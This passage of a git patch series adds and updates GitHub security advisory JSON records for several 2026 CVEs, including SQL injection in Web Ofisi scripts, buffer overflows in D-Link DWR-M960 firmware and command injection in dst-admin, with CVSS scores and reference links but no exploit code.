"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25457" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47145" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-firma-sql-injection-via-oz-parameter" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/kurumsal-firma-v13-sinirsiz-dil.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w7wm-w9qw-pc72/GHSA-w7wm-w9qw-pc72.json b/advisories/unreviewed/2026/02/GHSA-w7wm-w9qw-pc72/GHSA-w7wm-w9qw-pc72.json new file mode 100644 index 0000000000000..250d866e35528 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w7wm-w9qw-pc72/GHSA-w7wm-w9qw-pc72.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7wm-w9qw-pc72", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25459" + ], + "details": "Web Ofisi Emlak V2 contains multiple SQL injection vulnerabilities in the endpoint that allow unauthenticated attackers to manipulate database queries through GET parameters. Attackers can inject SQL code into parameters like emlak_durumu, emlak_tipi, il, ilce, kelime, and semt to extract sensitive database information or perform time-based blind SQL injection attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25459" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47142" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-emlak-sql-injection-via-emlak-arahtml" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/emlak-scripti-v3.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wf2x-4p8v-p7m6/GHSA-wf2x-4p8v-p7m6.json b/advisories/unreviewed/2026/02/GHSA-wf2x-4p8v-p7m6/GHSA-wf2x-4p8v-p7m6.json new file mode 100644 index 0000000000000..60ca50ad37bc5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wf2x-4p8v-p7m6/GHSA-wf2x-4p8v-p7m6.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wf2x-4p8v-p7m6", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25456" + ], + "details": "Web Ofisi Emlak v2 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'ara' GET parameter. Attackers can send requests to with time-based SQL injection payloads to extract sensitive database information or cause denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25456" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47141" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-emlak-sql-injection-via-ara-parameter" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/emlak-scripti-v2.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:15Z" + } +} \ No newline at end of file From 90d3ff730bc5ef9bfc78141f33d0d03927b022bb Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 22 Feb 2026 18:32:13 +0000 Subject: [PATCH 46/77] Publish Advisories GHSA-rwj4-mf8r-c2pg GHSA-wfh6-52w8-8gcj --- .../2025/10/GHSA-rwj4-mf8r-c2pg/GHSA-rwj4-mf8r-c2pg.json | 1 + .../2026/01/GHSA-wfh6-52w8-8gcj/GHSA-wfh6-52w8-8gcj.json | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/advisories/unreviewed/2025/10/GHSA-rwj4-mf8r-c2pg/GHSA-rwj4-mf8r-c2pg.json b/advisories/unreviewed/2025/10/GHSA-rwj4-mf8r-c2pg/GHSA-rwj4-mf8r-c2pg.json index 6853e440211dc..dbebe3b873d59 100644 --- a/advisories/unreviewed/2025/10/GHSA-rwj4-mf8r-c2pg/GHSA-rwj4-mf8r-c2pg.json +++ b/advisories/unreviewed/2025/10/GHSA-rwj4-mf8r-c2pg/GHSA-rwj4-mf8r-c2pg.json @@ -26,6 +26,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-1310", "CWE-288" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2026/01/GHSA-wfh6-52w8-8gcj/GHSA-wfh6-52w8-8gcj.json b/advisories/unreviewed/2026/01/GHSA-wfh6-52w8-8gcj/GHSA-wfh6-52w8-8gcj.json index c5f8ffd95c929..5b4bb0c4728ad 100644 --- a/advisories/unreviewed/2026/01/GHSA-wfh6-52w8-8gcj/GHSA-wfh6-52w8-8gcj.json +++ b/advisories/unreviewed/2026/01/GHSA-wfh6-52w8-8gcj/GHSA-wfh6-52w8-8gcj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wfh6-52w8-8gcj", - "modified": "2026-01-17T00:30:24Z", + "modified": "2026-02-22T18:31:00Z", "published": "2026-01-17T00:30:24Z", "aliases": [ "CVE-2026-21223" From 241db5feded02f0688f0292bc73e9705a063a74c Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 22 Feb 2026 21:33:10 +0000 Subject: [PATCH 47/77] Publish Advisories GHSA-5rm3-93cg-6rcr GHSA-c99q-x737-hc5j --- .../2026/02/GHSA-5rm3-93cg-6rcr/GHSA-5rm3-93cg-6rcr.json | 6 +++++- .../2026/02/GHSA-c99q-x737-hc5j/GHSA-c99q-x737-hc5j.json | 6 +++++- 2 files changed, 10 insertions(+), 2 deletions(-) diff --git a/advisories/unreviewed/2026/02/GHSA-5rm3-93cg-6rcr/GHSA-5rm3-93cg-6rcr.json b/advisories/unreviewed/2026/02/GHSA-5rm3-93cg-6rcr/GHSA-5rm3-93cg-6rcr.json index 0b8e34069dad2..7a68ca5826b2e 100644 --- a/advisories/unreviewed/2026/02/GHSA-5rm3-93cg-6rcr/GHSA-5rm3-93cg-6rcr.json +++ b/advisories/unreviewed/2026/02/GHSA-5rm3-93cg-6rcr/GHSA-5rm3-93cg-6rcr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5rm3-93cg-6rcr", - "modified": "2026-02-16T18:31:28Z", + "modified": "2026-02-22T21:31:25Z", "published": "2026-02-16T18:31:28Z", "aliases": [ "CVE-2026-26930" @@ -26,6 +26,10 @@ { "type": "WEB", "url": "https://www.smartertools.com/smartermail/release-notes/current" + }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2026/Feb/30" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-c99q-x737-hc5j/GHSA-c99q-x737-hc5j.json b/advisories/unreviewed/2026/02/GHSA-c99q-x737-hc5j/GHSA-c99q-x737-hc5j.json index bf2ba359be027..cdf08baa7182a 100644 --- a/advisories/unreviewed/2026/02/GHSA-c99q-x737-hc5j/GHSA-c99q-x737-hc5j.json +++ b/advisories/unreviewed/2026/02/GHSA-c99q-x737-hc5j/GHSA-c99q-x737-hc5j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c99q-x737-hc5j", - "modified": "2026-02-17T15:31:35Z", + "modified": "2026-02-22T21:31:25Z", "published": "2026-02-16T15:32:47Z", "aliases": [ "CVE-2026-2447" @@ -23,6 +23,10 @@ "type": "WEB", "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2014390" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00028.html" + }, { "type": "WEB", "url": "https://www.mozilla.org/security/advisories/mfsa2026-10" From 03f1c80ea1e5b3fd636dd7b70543bc7e43c5c68d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 00:32:04 +0000 Subject: [PATCH 48/77] Publish Advisories GHSA-36h6-rv4g-3jg5 GHSA-3w68-qp5h-x838 GHSA-58v6-hqx7-g3f3 GHSA-8gq5-mm3m-7h4x GHSA-8q98-3cmj-g687 --- .../GHSA-36h6-rv4g-3jg5.json | 56 +++++++++++++++++++ .../GHSA-3w68-qp5h-x838.json | 56 +++++++++++++++++++ .../GHSA-58v6-hqx7-g3f3.json | 52 +++++++++++++++++ .../GHSA-8gq5-mm3m-7h4x.json | 39 +++++++++++++ .../GHSA-8q98-3cmj-g687.json | 52 +++++++++++++++++ 5 files changed, 255 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-36h6-rv4g-3jg5/GHSA-36h6-rv4g-3jg5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3w68-qp5h-x838/GHSA-3w68-qp5h-x838.json create mode 100644 advisories/unreviewed/2026/02/GHSA-58v6-hqx7-g3f3/GHSA-58v6-hqx7-g3f3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8gq5-mm3m-7h4x/GHSA-8gq5-mm3m-7h4x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8q98-3cmj-g687/GHSA-8q98-3cmj-g687.json diff --git a/advisories/unreviewed/2026/02/GHSA-36h6-rv4g-3jg5/GHSA-36h6-rv4g-3jg5.json b/advisories/unreviewed/2026/02/GHSA-36h6-rv4g-3jg5/GHSA-36h6-rv4g-3jg5.json new file mode 100644 index 0000000000000..5b1f08301fd93 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-36h6-rv4g-3jg5/GHSA-36h6-rv4g-3jg5.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-36h6-rv4g-3jg5", + "modified": "2026-02-23T00:30:26Z", + "published": "2026-02-23T00:30:26Z", + "aliases": [ + "CVE-2026-2958" + ], + "details": "A security vulnerability has been detected in D-Link DWR-M960 1.01.07. Affected is the function sub_457C5C of the file /boafrm/formWsc. Such manipulation of the argument save_apply leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed publicly and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2958" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/25" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347325" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347325" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754509" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T00:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3w68-qp5h-x838/GHSA-3w68-qp5h-x838.json b/advisories/unreviewed/2026/02/GHSA-3w68-qp5h-x838/GHSA-3w68-qp5h-x838.json new file mode 100644 index 0000000000000..a2c1a30cec8df --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3w68-qp5h-x838/GHSA-3w68-qp5h-x838.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3w68-qp5h-x838", + "modified": "2026-02-23T00:30:26Z", + "published": "2026-02-23T00:30:26Z", + "aliases": [ + "CVE-2026-2959" + ], + "details": "A vulnerability was detected in D-Link DWR-M960 1.01.07. Affected by this vulnerability is the function sub_44E0F8 of the file /boafrm/formNewSchedule. Performing a manipulation of the argument url results in stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit is now public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2959" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/26" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347326" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347326" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754511" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T00:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-58v6-hqx7-g3f3/GHSA-58v6-hqx7-g3f3.json b/advisories/unreviewed/2026/02/GHSA-58v6-hqx7-g3f3/GHSA-58v6-hqx7-g3f3.json new file mode 100644 index 0000000000000..3c15584aa2a98 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-58v6-hqx7-g3f3/GHSA-58v6-hqx7-g3f3.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-58v6-hqx7-g3f3", + "modified": "2026-02-23T00:30:26Z", + "published": "2026-02-23T00:30:26Z", + "aliases": [ + "CVE-2026-2957" + ], + "details": "A weakness has been identified in qinming99 dst-admin up to 1.5.0. This impacts the function deleteBackup of the file src/main/java/com/tugos/dst/admin/controller/BackupController.java of the component File Handler. This manipulation causes denial of service. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2957" + }, + { + "type": "WEB", + "url": "https://fx4tqqfvdw4.feishu.cn/docx/YKwydLrdno51JtxJksmcWSfbnvd?from=from_copylink" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347324" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347324" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754510" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T23:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8gq5-mm3m-7h4x/GHSA-8gq5-mm3m-7h4x.json b/advisories/unreviewed/2026/02/GHSA-8gq5-mm3m-7h4x/GHSA-8gq5-mm3m-7h4x.json new file mode 100644 index 0000000000000..75d8610497366 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8gq5-mm3m-7h4x/GHSA-8gq5-mm3m-7h4x.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8gq5-mm3m-7h4x", + "modified": "2026-02-23T00:30:26Z", + "published": "2026-02-23T00:30:26Z", + "aliases": [ + "CVE-2026-2588" + ], + "details": "Crypt::NaCl::Sodium versions through 2.001 for Perl has an integer overflow flaw on 32-bit systems.\n\nSodium.xs casts a STRLEN (size_t) to unsigned long long when passing a length pointer to libsodium functions. On 32-bit systems size_t is typically 32-bits while an unsigned long long is at least 64-bits.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2588" + }, + { + "type": "WEB", + "url": "https://github.com/cpan-authors/crypt-nacl-sodium/commit/557388bdb4da416a56663cda0154b80cd524395c.patch" + }, + { + "type": "WEB", + "url": "https://github.com/cpan-authors/crypt-nacl-sodium/commit/8cf7f66ba922443e131c9deae1ee00fafe4f62e4.patch" + }, + { + "type": "WEB", + "url": "https://metacpan.org/release/TIMLEGGE/Crypt-NaCl-Sodium-2.001/source/Sodium.xs#L2119" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-190" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T00:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8q98-3cmj-g687/GHSA-8q98-3cmj-g687.json b/advisories/unreviewed/2026/02/GHSA-8q98-3cmj-g687/GHSA-8q98-3cmj-g687.json new file mode 100644 index 0000000000000..9b05e0928a0a1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8q98-3cmj-g687/GHSA-8q98-3cmj-g687.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8q98-3cmj-g687", + "modified": "2026-02-23T00:30:26Z", + "published": "2026-02-23T00:30:26Z", + "aliases": [ + "CVE-2026-2956" + ], + "details": "A security flaw has been discovered in qinming99 dst-admin up to 1.5.0. This affects the function revertBackup of the file /home/restore. The manipulation of the argument Name results in command injection. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2956" + }, + { + "type": "WEB", + "url": "https://fx4tqqfvdw4.feishu.cn/docx/ObYgdtoweowo8Vx4dmuckqC7nBe?from=from_copylink" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347323" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347323" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754508" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T22:15:59Z" + } +} \ No newline at end of file From ace7bffa840a4fa08e3fe04f7da545b28c63389e Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 03:32:04 +0000 Subject: [PATCH 49/77] Publish Advisories GHSA-5rv4-3jvj-f68v GHSA-6m36-rgr7-cxwp GHSA-72rq-263w-2jx8 GHSA-9rv8-797j-7r85 GHSA-m5mm-h952-fxjj GHSA-m69x-r9q9-whf9 GHSA-p2r3-72mr-vwg2 GHSA-w6qc-qw25-92c3 GHSA-xcgv-f626-23hx --- .../GHSA-5rv4-3jvj-f68v.json | 56 +++++++++++++++++++ .../GHSA-6m36-rgr7-cxwp.json | 56 +++++++++++++++++++ .../GHSA-72rq-263w-2jx8.json | 48 ++++++++++++++++ .../GHSA-9rv8-797j-7r85.json | 36 ++++++++++++ .../GHSA-m5mm-h952-fxjj.json | 54 ++++++++++++++++++ .../GHSA-m69x-r9q9-whf9.json | 52 +++++++++++++++++ .../GHSA-p2r3-72mr-vwg2.json | 56 +++++++++++++++++++ .../GHSA-w6qc-qw25-92c3.json | 44 +++++++++++++++ .../GHSA-xcgv-f626-23hx.json | 52 +++++++++++++++++ 9 files changed, 454 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-5rv4-3jvj-f68v/GHSA-5rv4-3jvj-f68v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6m36-rgr7-cxwp/GHSA-6m36-rgr7-cxwp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-72rq-263w-2jx8/GHSA-72rq-263w-2jx8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9rv8-797j-7r85/GHSA-9rv8-797j-7r85.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m5mm-h952-fxjj/GHSA-m5mm-h952-fxjj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m69x-r9q9-whf9/GHSA-m69x-r9q9-whf9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p2r3-72mr-vwg2/GHSA-p2r3-72mr-vwg2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w6qc-qw25-92c3/GHSA-w6qc-qw25-92c3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xcgv-f626-23hx/GHSA-xcgv-f626-23hx.json diff --git a/advisories/unreviewed/2026/02/GHSA-5rv4-3jvj-f68v/GHSA-5rv4-3jvj-f68v.json b/advisories/unreviewed/2026/02/GHSA-5rv4-3jvj-f68v/GHSA-5rv4-3jvj-f68v.json new file mode 100644 index 0000000000000..571749c693e05 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5rv4-3jvj-f68v/GHSA-5rv4-3jvj-f68v.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5rv4-3jvj-f68v", + "modified": "2026-02-23T03:30:21Z", + "published": "2026-02-23T03:30:21Z", + "aliases": [ + "CVE-2026-2960" + ], + "details": "A flaw has been found in D-Link DWR-M960 1.01.07. Affected by this issue is the function sub_468D64 of the file /boafrm/formDhcpv6s. Executing a manipulation of the argument submit-url can lead to stack-based buffer overflow. The attack can be executed remotely. The exploit has been published and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2960" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/27" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347327" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347327" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754512" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T01:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6m36-rgr7-cxwp/GHSA-6m36-rgr7-cxwp.json b/advisories/unreviewed/2026/02/GHSA-6m36-rgr7-cxwp/GHSA-6m36-rgr7-cxwp.json new file mode 100644 index 0000000000000..c342df6f96464 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6m36-rgr7-cxwp/GHSA-6m36-rgr7-cxwp.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6m36-rgr7-cxwp", + "modified": "2026-02-23T03:30:22Z", + "published": "2026-02-23T03:30:21Z", + "aliases": [ + "CVE-2026-2961" + ], + "details": "A vulnerability has been found in D-Link DWR-M960 1.01.07. This affects the function sub_4196C4 of the file /boafrm/formVpnConfigSetup of the component VPN Configuration Endpoint. The manipulation of the argument submit-url leads to stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2961" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/28" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347328" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347328" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754513" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T01:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-72rq-263w-2jx8/GHSA-72rq-263w-2jx8.json b/advisories/unreviewed/2026/02/GHSA-72rq-263w-2jx8/GHSA-72rq-263w-2jx8.json new file mode 100644 index 0000000000000..47162f464e146 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-72rq-263w-2jx8/GHSA-72rq-263w-2jx8.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-72rq-263w-2jx8", + "modified": "2026-02-23T03:30:22Z", + "published": "2026-02-23T03:30:22Z", + "aliases": [ + "CVE-2026-2964" + ], + "details": "A vulnerability was identified in higuma web-audio-recorder-js 0.1/0.1.1. Impacted is the function extend in the library lib/WebAudioRecorder.js of the component Dynamic Config Handling. Such manipulation leads to improperly controlled modification of object prototype attributes. It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitability is considered difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + 